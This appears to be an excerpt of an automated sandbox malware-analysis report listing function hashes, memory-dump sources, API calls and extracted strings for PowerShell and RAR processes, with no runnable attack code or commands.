Opcode Fuzzy Hash: 2f8798f1e23c1b34d7b5e9707af8de9ba002ec7b1af8ed5dc0e806bdd34db552
Instruction Fuzzy Hash: 76112935E0D6894FE756DB989054278BBE1FF48360F6841BFC44EDB187DE28A841C341

Function 00007FF8850933B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1551067542.00007FF885090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF885090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff885090000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70aa00635f972a6bac396fc46e5d72351287b17824183693041b1918d6b4f3e0
Instruction ID: ace0bbd3db313ae980c6e8695b3d96aefc90a2d3e6f3a2326e5b86d9afaf64d5
Opcode Fuzzy Hash: 70aa00635f972a6bac396fc46e5d72351287b17824183693041b1918d6b4f3e0
Instruction Fuzzy Hash: D501A73010CB0C4FDB44EF0CE451AA5B3E0FB85360F10052DE58AC3651DA36E882CB42

Function 00007FF88509A1FB Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1551067542.00007FF885090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF885090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff885090000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 187deb6d728f0e957a93801f34589cdff15a2b60ae2ecd85b9f9f5a1c35a72ef
Instruction ID: e56489c427cdd083b98c66c727d8649b42001b09690caf37b506de59c94d1c8f
Opcode Fuzzy Hash: 187deb6d728f0e957a93801f34589cdff15a2b60ae2ecd85b9f9f5a1c35a72ef
Instruction Fuzzy Hash: A8F0BB7660CA8C4FDB56DF1C9C554E57FA0FF66251B0901BBD848C7161D7228858C7D2

Function 00007FF8851669DD Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1551931312.00007FF885160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF885160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff885160000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de302eeccb7de5e059da72f856387f2f043255202f72032577eedb287ee4d6e4
Instruction ID: e6815af7f74b0846f027a92f32ad584e2071822dffdce20efee8af9c4efdcb8a
Opcode Fuzzy Hash: de302eeccb7de5e059da72f856387f2f043255202f72032577eedb287ee4d6e4
Instruction Fuzzy Hash: DDF0C831A0D6994FE746E7A854526E8BFE1FF49264F2400FEC04DD7253C91D9845C741

Function 00007FF88516432D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1551931312.00007FF885160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF885160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff885160000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2fb744e5988be4165ceff35a24de6348ccb6520a1933130b3fd65c31f752790
Instruction ID: 8a427eb3625c25f7e908b05f69cf6fa33fac25999df0fc5d62b66b21ad67fd16
Opcode Fuzzy Hash: c2fb744e5988be4165ceff35a24de6348ccb6520a1933130b3fd65c31f752790
Instruction Fuzzy Hash: 0AF0BE3AA0C5568FE669EA4CE4858A877E0FF49370B2100BAE14DCB1A7CB29FC44C741

Function 00007FF8851645E0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1551931312.00007FF885160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF885160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff885160000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a8116d475d7aa9ca45bc519fa57e178bfac6ef6fbc0e0ea42d7aba32646ad30
Instruction ID: 193f55ba0482d2a32cbeed59d52e5126f3ff7ef324223763a8be597386d6553c
Opcode Fuzzy Hash: 0a8116d475d7aa9ca45bc519fa57e178bfac6ef6fbc0e0ea42d7aba32646ad30
Instruction Fuzzy Hash: F9F05E3AA0C5458FD755EA5CE4855A877E0FF09371B1500B6E14DCB067DB69EC44C741

Non-executed Functions

Function 00007FF8850916C9 Relevance: 5.2, Strings: 4, Instructions: 177COMMON

Download Yara Rule

Strings

-M_^, xrefs: 00007FF885091701
;!, xrefs: 00007FF88509178A
,M_, xrefs: 00007FF8850917CA
,M_^, xrefs: 00007FF885091801

Memory Dump Source

Source File: 0000000C.00000002.1551067542.00007FF885090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF885090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff885090000_powershell.jbxd

Similarity

API ID:
String ID: ,M_^$-M_^$;!$,M_
API String ID: 0-3813663136
Opcode ID: 069a76245eddc4e49c02077827a9ecc54f13c97a177316ba632aedd9cada8b37
Instruction ID: e662d299f35b625e99fad1574c821e304a2f1cb4906434efef4043340a8f7bf2
Opcode Fuzzy Hash: 069a76245eddc4e49c02077827a9ecc54f13c97a177316ba632aedd9cada8b37
Instruction Fuzzy Hash: 3961E767D0D7C68FE702932858B51E67FA0AF13AE9B0901FBD4D48F0A7ED081816E356

Function 00007FF8850986FA Relevance: 5.1, Strings: 4, Instructions: 84COMMON

Download Yara Rule

Strings

L_^, xrefs: 00007FF885098712
L_^, xrefs: 00007FF885098772
L_^, xrefs: 00007FF885098762
L_^, xrefs: 00007FF885098722

Memory Dump Source

Source File: 0000000C.00000002.1551067542.00007FF885090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF885090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff885090000_powershell.jbxd

Similarity

API ID:
String ID: L_^$L_^$L_^$L_^
API String ID: 0-2357752022
Opcode ID: a4064907116e27672597e13b79a581632e3d891413fdfffd62148cdd47f66dbe
Instruction ID: 61276e561e9bfb41a47844282814366b98e69ce2605765d71eac9cacca20aa59
Opcode Fuzzy Hash: a4064907116e27672597e13b79a581632e3d891413fdfffd62148cdd47f66dbe
Instruction Fuzzy Hash: 6D31E8A790DBC60FF75346295D651A57FC0BF625A8B0E04F7C9989E197FF189C0AC201

Analysis Process: powershell.exePID: 7440, Parent PID: 2844COMMON

Executed Functions

Function 00007FF8867045F2 Relevance: .8, Instructions: 787COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000046.00000002.1731036665.00007FF886700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_70_2_7ff886700000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b258dcc9826c22b6238a8ebd2d189ea28f092b6a703c34a213ff59baaf41749d
Instruction ID: e791be89de80628e240da0f999b9e3dc62c0f7a2df5c3b788c48357f80847f0d
Opcode Fuzzy Hash: b258dcc9826c22b6238a8ebd2d189ea28f092b6a703c34a213ff59baaf41749d
Instruction Fuzzy Hash: 1E71C270D09A488FDB59EB6CD8656ECBBF1FF4A310F1441AED049D7296CA35AC02CB91

Function 00007FF8867D1838 Relevance: .8, Instructions: 754COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000046.00000002.1731775962.00007FF8867D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8867D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_70_2_7ff8867d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b468f009c83ceb7c388384dd249fc2221d88e3c78ace615d8f10741de0965e0e
Instruction ID: 09f2115da46afa7eb07e6cb6518ef89456b2627e5dadfe36bdd2024322405bed
Opcode Fuzzy Hash: b468f009c83ceb7c388384dd249fc2221d88e3c78ace615d8f10741de0965e0e
Instruction Fuzzy Hash: AB221721E0DBC94FE796A72858612B57BE1FF86290B1806FBD04DC71D7DD18AC09C392

Function 00007FF886703945 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000046.00000002.1731036665.00007FF886700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_70_2_7ff886700000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: b79654a04d9e77375290d9654693e2105d407be262a57873138dc4fe777d56cf
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: A701677111CB0D4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3655DB36E881CB46

Non-executed Functions

Function 00007FF8867006D0 Relevance: 7.6, Strings: 6, Instructions: 92COMMON

Download Yara Rule

Strings

/{, xrefs: 00007FF8867006F1
8,{, xrefs: 00007FF886700731
-{, xrefs: 00007FF886700771
P/{, xrefs: 00007FF886700721
(0{, xrefs: 00007FF886700751
H1{, xrefs: 00007FF8867006E1

Memory Dump Source

Source File: 00000046.00000002.1731036665.00007FF886700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_70_2_7ff886700000_powershell.jbxd

Similarity

API ID:
String ID: (0{$8,{$H1{$P/{$-{$/{
API String ID: 0-274568262
Opcode ID: f6f5fe7db19a2739ee4a854024b60b3125d153a2dbef602f9878d1896bd0adcd
Instruction ID: 2bed470ca48507984817c92e221b21ea3ab876f18d09a84ca8068616c9e72fad
Opcode Fuzzy Hash: f6f5fe7db19a2739ee4a854024b60b3125d153a2dbef602f9878d1896bd0adcd
Instruction Fuzzy Hash: FE21E652C0E9C15FF51A552838281B51AA2FF91BA4F1811BBD08C172CFE858DD1987F2

Analysis Process: rar.exePID: 5800, Parent PID: 6184COMMON

Execution Graph

Execution Coverage:	7.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.5%
Total number of Nodes:	1193
Total number of Limit Nodes:	40

Executed Functions

Function 00007FF7CF8954C0 Relevance: 36.3, APIs: 4, Strings: 16, Instructions: 1336COMMON

Download Yara Rule

Strings

*.%ls, xrefs: 00007FF7CF8959AF
default.sfx, xrefs: 00007FF7CF8960F4
stdin, xrefs: 00007FF7CF89672D
NUL, xrefs: 00007FF7CF895DB3
*?., xrefs: 00007FF7CF89598C
EML, xrefs: 00007FF7CF895D6B
LOG, xrefs: 00007FF7CF895CD0
7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx, xrefs: 00007FF7CF895935
SND, xrefs: 00007FF7CF895D11
SFX, xrefs: 00007FF7CF8960CC
rar.log, xrefs: 00007FF7CF895CE5
stdin, xrefs: 00007FF7CF896236
VER, xrefs: 00007FF7CF895EBA
+, xrefs: 00007FF7CF896535
OFF, xrefs: 00007FF7CF895E4B
ERR, xrefs: 00007FF7CF895D40

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID:
String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
API String ID: 0-1628410872
Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
Instruction ID: 8700fe038dc01d714b0ba7ec0b3bb7450f82de7f86915dbe0814476613b505db
Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
Instruction Fuzzy Hash: 99C2A03290C2D285EB64BF2481452FDA6E1AF017B4FD98135CA0E4B2C9DE6DF765A370

Function 00007FF7CF881884 Relevance: 24.1, APIs: 5, Strings: 8, Instructions: 1374COMMON

Download Yara Rule

Strings

sfx, xrefs: 00007FF7CF881884
q:, xrefs: 00007FF7CF8819DA
,6, xrefs: 00007FF7CF882F83
BK, xrefs: 00007FF7CF8819C5
exe, xrefs: 00007FF7CF881897
.ext, xrefs: 00007FF7CF8818C0
%s%s , xrefs: 00007FF7CF882A46
rar, xrefs: 00007FF7CF8818AA

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID:
String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
API String ID: 0-1660254149
Opcode ID: 78da4f876d830a6de95fab3adc7b8bfa4f2541ae6f304559d8ec8eb83d3802cb
Instruction ID: 1a9ccb1700cfd304ef68c8c6d220fd0c784b0bef1be25e58debd434a4b1764cd
Opcode Fuzzy Hash: 78da4f876d830a6de95fab3adc7b8bfa4f2541ae6f304559d8ec8eb83d3802cb
Instruction Fuzzy Hash: 11E2B126A09AC28AEB20EF25D8401FDA7E1FB457A8FC54036CA4D47796DF39E564D330

Function 00007FF7CF8C48CC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7CF8C4AE0: FreeLibrary.KERNEL32(?,?,00000000,00007FF7CF89CC90), ref: 00007FF7CF8C4AF5

GetModuleFileNameW.KERNEL32(?,?,?,00007FF7CF8B7E7D), ref: 00007FF7CF8C492E
GetVersionExW.KERNEL32(?,?,?,00007FF7CF8B7E7D), ref: 00007FF7CF8C496A
LoadLibraryExW.KERNELBASE(?,?,?,00007FF7CF8B7E7D), ref: 00007FF7CF8C4993
LoadLibraryW.KERNEL32(?,?,?,00007FF7CF8B7E7D), ref: 00007FF7CF8C499F

Strings

rarlng.dll, xrefs: 00007FF7CF8C493A

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: Library$Load$FileFreeModuleNameVersion
String ID: rarlng.dll
API String ID: 2520153904-1675521814
Opcode ID: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
Instruction ID: 4e345fc876273145de9d10c81a5a851e09cf1ac7dc991fae242d90a28f010cc5
Opcode Fuzzy Hash: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
Instruction Fuzzy Hash: E9316331A18AD2C9FB64AF21E8452E9A3A0FB557A4FC04035E94D43698DF3CD5A9D730

Function 00007FF7CF8A46EC Relevance: 7.6, APIs: 5, Instructions: 99
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF7CF8A4620,?,00000000,?,00007FF7CF8C7A8C), ref: 00007FF7CF8A4736
FindFirstFileW.KERNEL32(?,00000000,?,?,00007FF7CF8A4620,?,00000000,?,00007FF7CF8C7A8C), ref: 00007FF7CF8A476B
GetLastError.KERNEL32(?,00000000,?,?,00007FF7CF8A4620,?,00000000,?,00007FF7CF8C7A8C), ref: 00007FF7CF8A477A
FindNextFileW.KERNELBASE(?,?,00000000,?,?,00007FF7CF8A4620,?,00000000,?,00007FF7CF8C7A8C), ref: 00007FF7CF8A47A4
GetLastError.KERNEL32(?,00000000,?,?,00007FF7CF8A4620,?,00000000,?,00007FF7CF8C7A8C), ref: 00007FF7CF8A47B2

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
Instruction ID: 8420ebb37775374b8978070403e56857997c762f9a3aa4ff6a447f1ffd5083f4
Opcode Fuzzy Hash: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
Instruction Fuzzy Hash: 9F41A332B09AC596EA64AF25E4402E8A3E0FB497B4F804331EB7D437D5DF6CE1659720

Function 00007FF7CF89901C Relevance: 4.5, APIs: 3, Instructions: 35encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32 ref: 00007FF7CF89904D
CryptGenRandom.ADVAPI32 ref: 00007FF7CF899061
CryptReleaseContext.ADVAPI32 ref: 00007FF7CF899074

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
Instruction ID: 00a0517f63cc1aef2817fb1f4a1eccee25b6e4b80e637b862108faeaf6037e9d
Opcode Fuzzy Hash: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
Instruction Fuzzy Hash: 4C016D26B0869086EB00AF16A844779A7A1EBD4FE0F598031DE4D43B68CF7DD9569720

Function 00007FF7CF88B540 Relevance: 2.0, APIs: 1, Instructions: 490COMMON

Download Yara Rule

APIs

CharToOemA.USER32 ref: 00007FF7CF88B900

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: Char
String ID:
API String ID: 751630497-0
Opcode ID: 30cca9b820c2462ea9223497f218cfc72479732bc9d6405a30229187a307cc14
Instruction ID: e11b9b5154222da2c3d0c3fe74d4343d71b26b74c27792c67cbffd638b2b2ba5
Opcode Fuzzy Hash: 30cca9b820c2462ea9223497f218cfc72479732bc9d6405a30229187a307cc14
Instruction Fuzzy Hash: FB229232A086C296E714EE30D8401EEB7E0FB90B68F885036DA4D57299DF78E956D770

Function 00007FF7CF8AAE10 Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FF7CF8AB0C7

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2f7557d9bbb43876577635ce2a8ee37c70b1e2a3bca5ab09e7c7eb8e709d419
Instruction ID: 6b3a7d7707d1bd15b755a65af349bbd29b46c923db10b3daf9c1b4d72168356b
Opcode Fuzzy Hash: e2f7557d9bbb43876577635ce2a8ee37c70b1e2a3bca5ab09e7c7eb8e709d419
Instruction Fuzzy Hash: FA71F532A056C686D708EF29E4052ED73D1FB88FA4F144136DB5D8B399DF78A06197B0

Function 00007FF7CF8C3EA8 Relevance: 25.0, APIs: 3, Strings: 11, Instructions: 491
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcschr.LIBVCRUNTIME ref: 00007FF7CF8C3EF9
GetModuleFileNameW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7CF8C3E8F,?,00007FF7CF8B7E90), ref: 00007FF7CF8C3F14
snprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7CF8C43C6

Strings

DIRECTION, xrefs: 00007FF7CF8C4243
\, xrefs: 00007FF7CF8C4519
@%s:, xrefs: 00007FF7CF8C43A5
*messages***, xrefs: 00007FF7CF8C4050
DIALOG, xrefs: 00007FF7CF8C4227
MENU, xrefs: 00007FF7CF8C4235
STRINGS, xrefs: 00007FF7CF8C4219
,, xrefs: 00007FF7CF8C43FB
RTL, xrefs: 00007FF7CF8C437A
*messages***, xrefs: 00007FF7CF8C4080
$%s:, xrefs: 00007FF7CF8C439E

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: FileModuleNamesnprintfwcschr
String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS$\
API String ID: 602362809-1645646101
Opcode ID: 14e62526a5fe094f5313bc459bcb89c49d64b592d177cda5e67d6b33ee2d4267
